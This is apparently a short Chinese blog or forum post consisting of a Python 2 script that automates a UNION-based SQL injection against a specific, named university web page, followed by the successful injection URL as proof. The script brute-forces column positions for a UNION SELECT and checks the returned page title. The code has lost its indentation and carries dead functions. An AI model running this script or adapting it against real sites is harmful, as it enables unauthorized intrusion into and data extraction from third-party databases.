有python脚本为证：

import urllib2
import urlparse
import httplib
from time import sleep
url = "http://sw.scu.edu.cn/new_sw/infoDetail.jsp?id=650 and 1=2  "
error = ">500 - Page Error</"
ok = False
total = 0
length = 17
list = ['1','1','1','1','1',  '1','1','1','1','1',  '1','1','1','1','1',  '1' ,'1']
li = []
def main():
'''proxy_support = urllib2.ProxyHandler({"http":"http://localhost:8000"})
opener = urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
'''
for i in range(1, length + 1):
fun(i)
print total
def fun(i):
li = []
for j in range(0,i):
li.append(1)
recursion(li,1)
def execute(num):
dateList = []
for i in range(1,num +1):
dateList.append(i)
place(dateList)
print dateList
def place(dateList):
num = dateList.__len__()
for i in range(1, num +1 ):
move = dateList[num - i]
def recursion(li, p):
len = li.__len__()
if p > len:
proof(li)
return
if ok == True:
return
for i in range(li[p -1 ], length -len + p +1 ):
li[p-1] = i
for j in range(p, len):
li[j] = li[j-1] + 1;
if ok == True:
return
recursion(li, p+1)
def proof(li):
len = li.__len__()
for i in range(0, len):
list[li[i] - 1] = 'now()'
try_assembly(list)
clean()
def try_assembly(list):
global  total
global  url
total = total + 1
sql = " union select "
for i in range(0, length):
sql = sql + "'" + list[i] +"',";
sql = sql +'--'
sql = sql.replace(",--", " -- ")
sql = sql.replace("'now()'","now()")
u = url + sql
print sql
parser(u)
def clean():
global  list
list = []
for i in range(0, length):
list.append('1')
def parser(path):
global ok
print path
conn = urllib2.urlopen(path.replace(" ", "%20"))
data =  conn.read()
if data.split('title')[1] == error:
return False
else:
ok = True
print 'ok'+ path
return True
if __name__ == '__main__':
main()

有结果为证:

http://sw.scu.edu.cn/new_sw/infoDetail.jsp?id=650 and 1=2   union select '1','1','1','title',now(),'conten','key','1','1','1','1','1','1','1','1','1','1' --